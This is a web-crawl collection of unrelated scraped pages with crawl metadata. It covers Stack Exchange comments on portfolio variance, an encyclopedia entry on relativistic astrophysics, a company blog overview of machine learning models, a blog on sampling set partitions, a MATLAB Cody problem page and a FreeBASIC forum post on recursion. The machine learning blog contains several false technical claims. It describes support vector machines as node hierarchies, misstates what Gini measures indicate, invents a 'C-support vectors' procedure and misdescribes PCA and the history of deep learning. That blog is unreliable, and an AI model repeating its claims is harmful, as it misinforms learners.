– dvanderb Dec 4 '14 at 21:36\n• This is the doc which introduced VaR in the first place. So, yes, this stuff will be there, and it's written for applied folks, i.e. light on theory and easy to read. Also, you don't estimate $Var[\\ln(V_t)]$, but $Var[\\ln(r_t)]$ - returns, not log values. The diff of a log is a continuous return. – Aksakal Dec 4 '14 at 21:39\n• The problem for me is that I haven't done any portfolio management (I'm trying to figure this out for a web application and am learning as I go). I'm not sure why I would be able to estimate E[ln(Vt)] but not the variance. I guess I'll just need to keep reading and figure this out. Thanks for the help pointing me in the right direction. – dvanderb Dec 4 '14 at 21:52\n• @dvanderb, I updated the answer with a more streamlined exposition – Aksakal Dec 5 '14 at 2:22" ]
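A minimal numeric sketch of the variance calculation discussed in the answer above, with hypothetical inputs (the thread gives no concrete portfolio value or volatility; `V0`, `mu_r`, and `sigma_r` below are invented for illustration). It compares the linearized approximation Var[V1] ≈ V0²·Var[r] with the exact variance implied by treating V1 = V0·e^r as lognormal:

```python
import math

# Hypothetical figures, not from the thread: current value and one-period log-return stats.
V0 = 250_000.0   # current portfolio value
mu_r = 0.005     # mean of r = ln(V1 / V0)
sigma_r = 0.02   # standard deviation of r

# Linearized (V1 ≈ V0 + V0*r) approximation: Var[V1] ≈ V0^2 * Var[r].
std_linear = V0 * sigma_r

# Exact result when r ~ Normal(mu_r, sigma_r^2), so V1 = V0*exp(r) is lognormal:
# Var[V1] = V0^2 * exp(2*mu_r + sigma_r^2) * (exp(sigma_r^2) - 1).
std_exact = V0 * math.sqrt(math.exp(2 * mu_r + sigma_r**2) * (math.exp(sigma_r**2) - 1))

print(f"linearized std of V1: {std_linear:,.2f}")
print(f"lognormal  std of V1: {std_exact:,.2f}")
```

For a small sigma_r the two figures nearly coincide, which is the point of the linearization in the answer.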
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9088972,"math_prob":0.9366579,"size":1172,"snap":"2021-21-2021-25","text_gpt3_token_len":272,"char_repetition_ratio":0.12243151,"word_repetition_ratio":0.0093896715,"special_character_ratio":0.23720136,"punctuation_ratio":0.08974359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964812,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-14T20:19:25Z\",\"WARC-Record-ID\":\"<urn:uuid:994ffc63-a89a-4b83-96b2-d45fc8475157>\",\"Content-Length\":\"168264\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2308e95d-5a69-4ba8-8493-2dd8635c6ab1>\",\"WARC-Concurrent-To\":\"<urn:uuid:72d319d3-ae86-4caf-bd8c-3669fdf9e95d>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/126675/variance-of-portfolio-future-values-based-on-return-distribution\",\"WARC-Payload-Digest\":\"sha1:BP2NWZCRGINMPFLFC5ML4KYEKM7KHGJ4\",\"WARC-Block-Digest\":\"sha1:Y6T7NAZX2PUBTKHN4CST7JY3PIGRNCIJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991207.44_warc_CC-MAIN-20210514183414-20210514213414-00395.warc.gz\"}"}
https://encyclopediaofmath.org/wiki/Relativistic_astrophysics,_mathematical_problems_in
[ "# Relativistic astrophysics, mathematical problems in\n\nProblems that arise in the study of astrophysical phenomena in which relativistic effects, i.e. effects of the special or general theory of relativity (cf. Relativity theory), are significant.\n\nMathematical problems in relativistic astrophysics are commonly divided into problems relating to cosmology — the science of the structure and the evolution of the Universe, and problems of relativistic astrophysics of individual celestial bodies. The solution of A.A. Friedman (cf. Cosmological models) is an example of a cosmological solution that describes the expansion (or contraction) of a homogeneous and isotropic Universe. Homogeneous anisotropic cosmological solutions have been classified (9 Bianchi types have been identified) and are well studied. Anisotropic and non-homogeneous solutions, being slight deviations from Friedman's solution (a linear approximation) have been studied in detail, and several simple non-linear solutions have been constructed.\n\nAn especially interesting problem is that of the presence of a singular point in the general cosmological solution at which infinite density of matter and an infinite space-time curvature is reached. Singularities have been shown to be unavoidable in the past under conditions that took place in the real Universe, and a general solution of the equations of the general theory of relativity with a singularity has been constructed. Active research is being conducted on the possibility of constructing cosmological solutions without a singularity, representing a departure from the framework of the traditional general theory of relativity.\n\nA large class of problems involves the study of the interaction of relic radiation (which occupies space) with matter during the expansion of the Universe, and of the physical processes capable of generating such radiation.\n\nThe mathematical problems in relativistic astrophysics for individual celestial bodies concern the equilibrium and stability of stars and constellations. Equilibrium masses have been found in white dwarfs and neutron stars, and the relativistic collapse of more massive stars (which turn into so-called \"black holes\" — objects that are only observable through their gravitational field) is also being studied. In connection with the search for and the study of relativistic objects (neutron stars, \"black holes\" , etc.), the problem of the accretion in them of matter with a magnetic field is studied.\n\nThe mathematical problems in relativistic astrophysics also include research on gravitational radiation. In a weak gravitational field in empty space the perturbations, e.g. the invariants of curvature, satisfy the wave equation, and the field of gravity extends in space like electromagnetic waves.\n\nHow to Cite This Entry:\nRelativistic astrophysics, mathematical problems in. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Relativistic_astrophysics,_mathematical_problems_in&oldid=24550\nThis article was adapted from an original article by A.A. Ruzmaikin (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85324603,"math_prob":0.8510068,"size":5130,"snap":"2021-43-2021-49","text_gpt3_token_len":1367,"char_repetition_ratio":0.1367538,"word_repetition_ratio":0.029247912,"special_character_ratio":0.2654971,"punctuation_ratio":0.20986359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98718286,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T10:50:08Z\",\"WARC-Record-ID\":\"<urn:uuid:f7321166-5f0c-484d-aad2-f638efd81288>\",\"Content-Length\":\"21815\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f1069d90-ff6a-4cc5-9249-dcff1e960b9a>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2b094b7-7972-4b65-abb0-e859c30bd852>\",\"WARC-IP-Address\":\"34.96.94.55\",\"WARC-Target-URI\":\"https://encyclopediaofmath.org/wiki/Relativistic_astrophysics,_mathematical_problems_in\",\"WARC-Payload-Digest\":\"sha1:6K3XNMWFBP3Q6TBFYUAB7W2VRRULTXTS\",\"WARC-Block-Digest\":\"sha1:JEXZ5OVUNADZBS37PZQZ77IT7Z4CKEDV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585305.53_warc_CC-MAIN-20211020090145-20211020120145-00259.warc.gz\"}"}
https://askboss.ai/all-you-need-to-know-about-machine-learning-models/
[ "# All You Need To Know About Machine Learning Models\n\n## Introduction To Machine Learning Models\n\nMachine learning models are software functions that have been trained to recognize certain types of patterns and make predictions. Machine Learning models are used in various fields like finance, retail, healthcare and marketing to learn with the given data and predict future outcomes. These models can be built for and applied to different industries as well.\n\nMachine learning starts with an functional architecture or layout for training. After training what emerges is effectively an algorithm, or a set of steps computers can then use to make predictions when new data is introduced. Models learn from the given datasets in order to derive patterns and make predictions for new data. The five machine learning models we will discuss today are classification models, regression models, clustering, dimensionality reduction, and deep learning.\n\n## Popular Machine Learning Algorithms\n\nThere are four main types of machine learning algorithms.\n\n1. Supervised learning - the learning model is taught by finding patterns in the data and learns from observations. The operator provides the machine a dataset with known inputs and outputs. The algorithm then makes predictions based on the inputs and known correct answers. The operator corrects these predictions until the learning algorithms operate with high accuracy.\n2. Semi-supervised - similar to supervised learning; however, it uses labelled and unlabelled data to help the learning model understand the data.\n3. Unsupervised- machine learning algorithm identifies patterns in data without an answer key or operator to provide instruction.\n4. Reinforcement learning - teaches the learning algorithms trial and error. The machine is active and adapts its approaches to achieve the best results possible.\n\n## Classification Model\n\nA classification model is a machine learning model that classifies new data into categories. To do this, the model uses patterns from training data to determine which category a particular piece of new data should belong to.\n\nThe main benefit of this model is that it can handle both labeled and unlabeled data. This means that the algorithm only needs to be shown an example of what the correct category for a particular piece of new data should be in order to determine how it should be classified.\n\nThere are different types of classification models, but the most popular are decision trees and support vector machines.\n\n## Decision Trees\n\nA decision tree is a type of classification model that uses a hierarchy of nodes to classify data. The algorithm starts by identifying a root node, which is the category that all new data will be classified into. From there, the algorithm splits the data into two categories, and determines which category each new piece of data should belong to. This process is repeated until all the data has been classified.\n\nThe advantage of using a decision tree is that it is easy to understand and interpret. The disadvantage is that they can be fragile, meaning that they can be easily broken by changes in the input dataset.\n\n### Model Parameters\n\nOnce a decision tree has been created, there are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Split Criteria\n\nThe split criterion determines how the algorithm should determine which category to place new data into. 
There are several different split criteria that can be used, but the most common are the entropy and Gini indices.\n\n### Entropy\n\nThe entropy criterion measures the amount of uncertainty associated with a particular category. The higher the entropy, the more uncertain the category is.\n\n### Gini Coefficient\n\nThe Gini coefficient is a measure of how evenly the data is distributed across the categories. The higher the Gini coefficient, the more even the distribution of data.\n\n### Impurity Measures\n\nAfter splitting up the dataset into two categories using a split criterion, impurity measures can be used to determine how pure each category is. There are different types of impurity measures that can be used, but the most common are the misclassification error and the Gini impurity.\n\n### Misclassification Error\n\nThe misclassification error is the percentage of data that is incorrectly classified into a particular category.\n\n### Gini Impurity\n\nThe Gini impurity is a measure of how evenly the data is distributed across the categories. The higher the Gini impurity, the more even the distribution of data.\n\n### Missing Values\n\nWhen a tree splits a dataset into two categories, it can have a negative impact on accuracy if there are any missing values in the input dataset. Imputation methods can be used to correct this issue by using mean or mode estimates for these missing values.\n\n## Support Vector Machines\n\nSupport vector machines (SVMs) are a type of classification model that is similar to decision trees, but has the advantage of being less fragile. Like decision trees, SVMs use a hierarchy of nodes to classify data, but they are able to do this with a much higher accuracy.\n\nIn order to create an SVM, a dataset is first divided into two categories: the training data and the testing data. The training data is used to create the model, and the testing data is used to evaluate the accuracy of the model.\n\nThe algorithm starts by determining the hyperplane that best separates the two categories. A hyperplane is simply a line or plane that divides a dataset into two categories. The algorithm then calculates the distance of each data point to the hyperplane. The data points that are closest to the hyperplane are classified into the same category, and the data points that are furthest away are classified into the other category.\n\n### Learning Model Parameters\n\nThere are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Kernel\n\nThe kernel is the function that is used to calculate the distance of each data point to the hyperplane. There are several different types of kernels that can be used, but the most common are the linear kernel and the polynomial kernel.\n\n### Threshold\n\nThe threshold is used to determine whether or not the data points are classified into the same category. The data points that are closest to the hyperplane are always included, but if there is no point within some threshold distance of the hyperplane, then the algorithm will classify all the data points on one side of it as part of one group and all those on the other side as part of the other group.\n\n### Iterations\n\nSVMs use a variety of iterations in order to continually improve accuracy and avoid overfitting. 
Overfitting occurs when the model becomes too complex and begins to fit noise in the data instead of the actual patterns that would allow it to make accurate predictions for future data sets. When it comes time to use the SVM for prediction, the number of iterations that were used to create the model can be reduced in order to improve performance.\n\n### C-Support Vectors\n\nThe C-support vectors are a subset of the support vectors that are used to improve the accuracy of predictions. The algorithm calculates the distance of each data point to each of the support vectors, and then selects the support vectors that have the smallest distance. These support vectors are then used to improve the accuracy of predictions.\n\n## Regression Models\n\nRegression models make predictions about a dependent variable based on the value of one or more independent variables. These models are often used to forecast sales volume, forecast election outcomes, and make movie recommendations.\n\nThere are several different types of regression models, but the most popular are linear regression and logistic regression.\n\n## Linear Regression\n\nLinear regression is a type of regression model that uses a straight line to predict the value of the dependent variable. The advantage of this model is that it is easy to understand and interpret. The disadvantage is that it can easily be broken by changes in the input dataset.\n\n### Model Parameters\n\nOnce a linear regression model has been created, there are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Regression Coefficients\n\nThe regression coefficients are numerical weights that are used to multiply the independent variables, so that they can be combined into a single number. The regression coefficients provide insight on which of the independent variables may be most important in predicting the dependent variable.\n\n### Standard Error\n\nThe standard error of the regression is used to measure how accurate future predictions will be based on past data. The lower the standard error, the more accurate the predictions will be.\n\n### Residuals\n\nThe residuals are the difference between the observed values of the dependent variable and the predicted values of the dependent variable. These residuals can be used to identify any patterns in the data that were not captured by the regression model.\n\n## Logistic Regression\n\nLogistic regression is a type of regression model that is used to predict the probability of a particular event occurring. The advantage of this model is that it can be used to predict binary outcomes, such as whether or not a customer will buy a product. The disadvantage is that it is more complex than linear regression and can be difficult to interpret.\n\n## Clustering\n\nWith the rapid evolution of technology, machine learning models are being used to solve business challenges. The most popular algorithm for solving these problems is clustering. Clustering algorithms identify groups of similar data points together and produce patterns within those groups.\n\nThe advantage of using clustering algorithms is that they can be used on large datasets to find. Clustering is the process of grouping data points together based on their similarities. 
There are several different types of clustering algorithms, but the most popular are K-means clustering and hierarchical clustering.\n\n## K-Means Clustering\n\nK-means clustering is a type of clustering algorithm that uses a distance metric to group data points together. The algorithm starts by randomly selecting a number of data points, called the centroids, and then groups the remaining data points together based on their distance from the centroids.\n\nThe advantage of this algorithm is that it is fast and easy to implement. The disadvantage is that it can produce clusters that are not well-defined.\n\n## Hierarchical Clustering\n\nHierarchical clustering is a type of clustering algorithm that starts by placing each data point in its own cluster. Then, the algorithm merges smaller clusters together until there are only a few large clusters left.\n\nThe advantage of this model is that it can provide several different levels of detail for each group of data points and can be used to identify outliers. The disadvantage is that it may produce clusters that overlap and merge together.\n\n## Dimensionality Reduction\n\nOne of the challenges of machine learning is that the data can often be quite large and complex. This can make it difficult to find patterns and make predictions. Dimensionality reduction is a technique that can be used to reduce the size of the data, so that it is easier to work with.\n\nThere are several different types of dimensionality reduction algorithms, but the most popular are principal component analysis (PCA) and t-distributed Stochastic Neighbor Embedding (t-SNE).\n\n## Principal Component Analysis (PCA)\n\nPrincipal component analysis is a type of dimensionality reduction algorithm that uses a matrix decomposition to reduce the number of dimensions in the data. The algorithm starts by computing the eigenvalues and eigenvectors of the data matrix. Then, the first eigenvector is chosen as the first principal component and the second eigenvector is chosen as the second principal component.\n\nThe advantage of this algorithm is that it can make predictions even on large datasets. The disadvantage is that it can produce different results when run multiple times on the same dataset.\n\n## Deep Learning\n\nDeep learning is a subset of artificial intelligence that uses artificial neural networks to automate tasks. The algorithm is programmed with structured data and has the ability to learn on its own to improve its performance.\n\nA research team at Microsoft conducted the first successful deep learning experiment in 2008, where they trained an algorithm to recognize handwritten digits from the MNIST database.\n\nThe advantage of deep learning is that it can be used for complicated tasks like image recognition, speech recognition, language translation, and emotion detection. The disadvantage of deep learning is that it requires large amounts of data sets to train the algorithm with.\n\n## Machine Learning Conclusion\n\nMachine Learning Models are an important part of artificial intelligence. Using algorithms, they can learn from the given data to make predictions for future behavior with high accuracy.\n\nMachine learning models when it comes to data modeling is a subset of artificial intelligence that uses algorithms in order to categorize large datasets and form predictions for future behavior with high accuracy. The algorithm learns from the given datasets in order to derive patterns and make predictions for new data. 
The advantage of using clustering algorithms is that they can be used on large datasets to find groupings or clusters based on their similarities.\n\nIf you'd like to learn more about machine learning models or want help implementing these principles in your own company, talk to one of our DATA BOSSES! Our team would be happy to partner with you and create a roadmap that provides you with predictive analytics and a design engine.\n\nSubscribe to the Latest Insight\n\nAchieve AI at Scale" ]
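As a concrete illustration of the classification-model material above (the article names no library or dataset, so scikit-learn and its bundled iris data are assumptions made purely for this sketch), a decision tree can be fit and evaluated in a few lines, with the `criterion` argument selecting between the Gini and entropy split criteria discussed earlier:

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

# Labelled data, i.e. supervised learning: known inputs and known outputs.
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)

# "criterion" chooses the split criterion: "gini" (Gini impurity) or "entropy".
tree = DecisionTreeClassifier(criterion="entropy", max_depth=3, random_state=0)
tree.fit(X_train, y_train)

# Score on held-out data; a large gap between train and test accuracy signals overfitting.
print("train accuracy:", tree.score(X_train, y_train))
print("test accuracy:", tree.score(X_test, y_test))
```

Limiting `max_depth` is one simple guard against the overfitting described above for overly complex models.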
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91655546,"math_prob":0.9406281,"size":13764,"snap":"2022-40-2023-06","text_gpt3_token_len":2524,"char_repetition_ratio":0.15305233,"word_repetition_ratio":0.15784712,"special_character_ratio":0.17538506,"punctuation_ratio":0.0712191,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9865694,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-27T18:47:52Z\",\"WARC-Record-ID\":\"<urn:uuid:e18fbdfd-aead-4cbb-b5a4-895b637fbd65>\",\"Content-Length\":\"384100\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aeef6341-a66a-4f1d-8896-8e86fa023dc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:a735e600-c621-41ff-a463-ddedb505a092>\",\"WARC-IP-Address\":\"35.209.35.36\",\"WARC-Target-URI\":\"https://askboss.ai/all-you-need-to-know-about-machine-learning-models/\",\"WARC-Payload-Digest\":\"sha1:TSQYRVWZOHQSU6365BIQGXEVB7CWK36Z\",\"WARC-Block-Digest\":\"sha1:RG2QU52Q7ACSU5LJ4BHX3YQ5TK6SIUYZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764495001.99_warc_CC-MAIN-20230127164242-20230127194242-00090.warc.gz\"}"}
http://thousandfold.net/cz/2013/09/
[ "## Sampling uniformly from the set of partitions into a fixed number of nonempty sets\n\nIt’s easy to sample uniformly from the set of partitions of a set: you pick a number of bins using an appropriate exponential distribution, then randomly i.i.d. toss each element of the set into one of those bins. At the end of this procedure, the nonempty bins will constitute your uniformly sampled random partition. [literature ref: “Generation of a random partition of a finite set by an urn model” by Stam, 1983; pretty pictures ref: see this blog post].\n\nIs there a similarly efficient and simple algorithm for sampling uniformly from the set of partitions into a fixed number of nonempty sets? The only algorithm I’m aware of takes advantage of the fact that the number of such partitions is given by $$\\left\\{n \\atop p \\right\\}$$, a Stirling number of the second kind, if the set has $$n$$ elements and we desire $$p$$ nonempty subsets in the partition. In particular, we have the identity\n$\\left\\{ {n \\atop p} \\right\\} = \\left\\{ {n-1 \\atop p-1} \\right\\} + p \\left\\{ {n-1 \\atop p} \\right\\}$\nthat comes from observing that the only two ways to construct a partition of $$n$$ elements into $$p$$ nonempty sets are to: either partition the first $$n-1$$ elements into $$p-1$$ nonempty sets and take the remaining singleton as our final set in the partition, or we partition the first $$n-1$$ elements into $$p$$ nonempty sets and place the remaining element into any of these $$p$$ sets.\n\nThis observation leads to a straightforward recursive sampling procedure: with probability $$\\left\\{ {n-1 \\atop p-1} \\right\\}/\\left\\{ {n \\atop p} \\right\\}$$, use the first procedure with a randomly sampled partition of the first $$n-1$$ elements into $$p-1$$ nonempty sets, otherwise use the second procedure with a randomly sampled partition of the first $$n-1$$ elements into $$p$$ nonempty sets.\n\nUnfortunately, this is not an efficient procedure for several reasons. In particular, it requires computing Stirling numbers, and taking their ratio. When $$n,k$$ are large, this will require both computational time and, more of a practical impediment, arbitrary-precision arithmetic. A straightforward implementation also relies on recursion, which is infeasible when $$n$$ is large. Clearly one can implement this algorithm without using recursion; one can also use an asymptotic expansion of the Stirling numbers to approximate the ratio $$\\left\\{ {n-1 \\atop p-1} \\right\\}/\\left\\{ {n \\atop p} \\right\\}$$ when $$n,k$$ are large … but this comes at the cost of some unspecified inaccuracy and just doesn’t feel right.\n\nSo the question remains: is there an efficient and simple way to sample uniformly from the set of partitions into a fixed number of nonempty sets?\n\n## I miss Mathematica\n\nWhy? Because Mathics is not up to helping me determine if indeed\n$f(\\{A_1, \\ldots, A_p\\}) = \\frac{(n-p)!^2}{n! p!} \\left(\\frac{1}{p} \\right)^{n-p} \\frac{|A_1|^2 \\cdots |A_p|^2}{|A_1|!\\cdots |A_p|!}$\nis a pmf over the set of partitions of the set $$\\{1, \\ldots, n\\}$$ into $$p \\leq n$$ nonempty sets. In particular, the sets $$A_1, \\ldots, A_p$$ in the formula above satisfy $$|A_1| + \\ldots +|A_p| = n$$ and $$|A_i| \\geq 1$$ for all $$i.$$\n\nI feel like I could empirically test this easily in Mathematica, but OMG trying to do it in Matlab is a real pain, so I gave up. 
Combinatorics or set manipulation in Matlab in general is an exercise in trying to make a smoothie with a grater: you can do it, eventually, but it’s going to take forever and make a mess." ]
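The recursive sampling procedure described in the post is easy to prototype; the sketch below is not from the post (`stirling2` and `sample_partition` are names invented here) and uses Python's exact integer arithmetic for the Stirling numbers, which sidesteps the precision worry at the cost of exactly the inefficiency the post complains about:

```python
import random
from functools import lru_cache

@lru_cache(maxsize=None)
def stirling2(n, p):
    """Stirling number of the second kind: partitions of an n-set into p nonempty blocks."""
    if n == p:
        return 1            # includes the empty case n = p = 0
    if p == 0 or p > n:
        return 0
    # {n, p} = {n-1, p-1} + p * {n-1, p}
    return stirling2(n - 1, p - 1) + p * stirling2(n - 1, p)

def sample_partition(n, p):
    """Uniformly sample a partition of {1, ..., n} into p nonempty blocks (1 <= p <= n)."""
    if p == n:
        return [{i} for i in range(1, n + 1)]
    if p == 1:
        return [set(range(1, n + 1))]
    # With probability {n-1, p-1} / {n, p}, element n forms a singleton block ...
    if random.randrange(stirling2(n, p)) < stirling2(n - 1, p - 1):
        blocks = sample_partition(n - 1, p - 1)
        blocks.append({n})
    else:
        # ... otherwise partition the first n-1 elements into p blocks and
        # drop element n into one of them uniformly at random.
        blocks = sample_partition(n - 1, p)
        random.choice(blocks).add(n)
    return blocks

print(sample_partition(10, 4))
```

Because `random.randrange` draws an exact integer below $$\left\{n \atop p \right\}$$, the branch test reproduces the ratio $$\left\{ {n-1 \atop p-1} \right\}/\left\{ {n \atop p} \right\}$$ without any floating-point approximation or asymptotic expansion.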
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.872324,"math_prob":0.99839914,"size":2660,"snap":"2019-51-2020-05","text_gpt3_token_len":645,"char_repetition_ratio":0.14307229,"word_repetition_ratio":0.14588235,"special_character_ratio":0.24924812,"punctuation_ratio":0.08571429,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T04:22:05Z\",\"WARC-Record-ID\":\"<urn:uuid:84dd2242-53f0-4b18-ba26-bb5fe05e653e>\",\"Content-Length\":\"25746\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58590190-55e2-45de-bdf4-f1c43f5e347d>\",\"WARC-Concurrent-To\":\"<urn:uuid:5155cc42-1cad-4bff-a463-83b3c9382130>\",\"WARC-IP-Address\":\"208.97.151.24\",\"WARC-Target-URI\":\"http://thousandfold.net/cz/2013/09/\",\"WARC-Payload-Digest\":\"sha1:3PCFQWC2ICRRLZRVPM36EVJJK6K5K566\",\"WARC-Block-Digest\":\"sha1:6XW6P4DWOKYT5FPPWWGPRZ56FCFB5AD3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251788528.85_warc_CC-MAIN-20200129041149-20200129071149-00383.warc.gz\"}"}
https://ch.mathworks.com/matlabcentral/cody/problems/649-return-the-first-and-last-character-of-a-string/solutions/2685410
[ "Cody\n\n# Problem 649. Return the first and last character of a string\n\nSolution 2685410\n\nSubmitted on 13 Jul 2020 by 雨晴 张\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = 'abcde'; y_correct = 'ae'; assert(isequal(stringfirstandlast(x),y_correct))\n\n2   Pass\nx = 'a'; y_correct = 'aa'; assert(isequal(stringfirstandlast(x),y_correct))\n\n3   Pass\nx = 'codyrocks!'; y_correct = 'c!'; assert(isequal(stringfirstandlast(x),y_correct))\n\n### Community Treasure Hunt\n\nFind the treasures in MATLAB Central and discover how the community can help you!\n\nStart Hunting!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5208728,"math_prob":0.83667415,"size":592,"snap":"2020-45-2020-50","text_gpt3_token_len":165,"char_repetition_ratio":0.14795919,"word_repetition_ratio":0.0,"special_character_ratio":0.28716215,"punctuation_ratio":0.13592233,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9625992,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T06:14:33Z\",\"WARC-Record-ID\":\"<urn:uuid:22f2a727-c3e1-4bdd-89a5-51d3fe4f4335>\",\"Content-Length\":\"80342\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad736340-3b3b-45ff-b25c-b973bb78c450>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bb66d8d-f659-4690-9abc-d51dcb46c5ad>\",\"WARC-IP-Address\":\"184.25.198.13\",\"WARC-Target-URI\":\"https://ch.mathworks.com/matlabcentral/cody/problems/649-return-the-first-and-last-character-of-a-string/solutions/2685410\",\"WARC-Payload-Digest\":\"sha1:FKNUCXYTTBNNFIZRJRCHD36PH4WMJ4JE\",\"WARC-Block-Digest\":\"sha1:MIAI4YAHLBXYIRTV67TJ46KCBUIVN64C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141652107.52_warc_CC-MAIN-20201201043603-20201201073603-00529.warc.gz\"}"}
https://www.freebasic.net/forum/viewtopic.php?f=9&t=27026&amp
[ "## How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nForum for discussion about the documentation project.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nIteration and recursion are two very useful ways to program, especially to perform a certain number of times a certain script, and thus allow optimization of the code. If iteration is relatively easy to understand, recursion is a concept not necessarily obvious at the beginning.\nWhen speaking of a recursive procedure (subroutine or function), we refer to a syntactic characteristic: the procedure, in its own definition, refers to itself (it calls itself).\nBut when talking about recursive process, linear or tree, we are interested in the process flow, not in the syntax of the procedure's writing.\nThus, a procedure can have a recursive definition but correspond to an iterative process.\n\nSome treatments are naturally implemented as a recursive algorithm (although this is not always the most optimal solution).\nThe main problem of the recursive approach is that it consumes potentially a lot of space on the execution stack: from a certain level of \"depth\" of recursion, the space allocated for the execution stack of the thread is exhausted, and causes an error of type \"stack overflow\".\nRepeatedly calling the same procedure can also make the execution slower, although this may make the code easier.\nTo increase the speed of execution, simple recursive algorithms can be recreated in little more complicated iterative algorithms using loops that execute much faster.\n\nWhat is the use of recursion if it increases the execution time and memory space compared to an iterative solution?\nThere are still cases where it is not possible to do otherwise, where iterative translation does not exist or, where it exists, is much heavier to implement (requiring for example a dynamic storage capacity to substitute for the execution stack).\n\n1) Recursion and Iteration\nRecursion and iteration both repeatedly execute the instruction set:\n• Recursion occurs when an instruction in a procedure calls the procedure itself repeatedly.\n• Iteration occurs when a loop executes repeatedly until the control condition becomes false.\nThe main difference between recursion and iteration is that recursion is a process always applied to a procedure, while iteration is applied to a set of instructions to execute repeatedly.\n1.1) Definition of Recursion\nFreeBASIC allows a procedure to call itself in its code. This means that the procedure definition has a procedure call to itself. The set of local variables and parameters used by the procedure are newly created each time the procedure is called and are stored at the top of the execution stack. But every time a procedure calls itself, it does not create a new copy of that procedure. The recursive procedure does not significantly reduce the size of the code and does not even improve the memory usage, but it does a little bit compared to iteration.\n\nTo end recursion, a condition must be tested to force the return of the procedure without giving a recursive call to itself. 
The absence of a test of a condition in the definition of a recursive procedure would leave the procedure in infinite recursion once called.\n\nNote: When the parameters of a recursive procedure are passed by reference, take care to work with local variables when the code body needs to modify their values.\n\n1. Simple example with a recursive function which returns the factorial of the integer:\nThe code body of the recursive function is defined by using the recursive definition of the factorial function:\nCase (n = 0) : factorial(0) = 1\nCase (n > 0) : factorial(n) = n * factorial(n-1)\nThe first line allows to determine the end condition: 'If (n = 0) Then Return 1'\nThe second line allows to determine the statement syntax which calls the function itself: 'Return n * factorial(n - 1)'\n\nFull code:\n\nCode: Select all\n\n`Function recursiveFactorial (Byval n As Integer) As Integer  If (n = 0) Then                         '' end condition    Return 1  Else                                    '' recursion loop    Return n * recursiveFactorial(n - 1)  '' recursive call  End IfEnd Function`\n1.2) Definition of Iteration\nIteration is a process of repeatedly executing a set of instructions until the iteration condition becomes false.\nThe iteration block includes the initialization, the comparison, the execution of the instructions to be iterated and finally the update of the control variable.\nOnce the control variable is updated, it is compared again and the process is repeated until the condition in the iteration is false.\nIteration blocks are \"for\" loop, \"while\" loop, ...\n\nThe iteration block does not use the execution stack to store the variables at each cycle. Therefore, the execution of the iteration block is faster than the recursion block. In addition, iteration does not have the overhead of repeated procedure calls that also make its execution faster than a recursion.\nThe iteration is complete when the control condition becomes false.\n\n1. Simple example with a iterative function which returns the factorial of the integer:\nThe code body of the iterative function is defined by using the iterative definition of the factorial function:\nCase (n = 0) : factorial(0) = 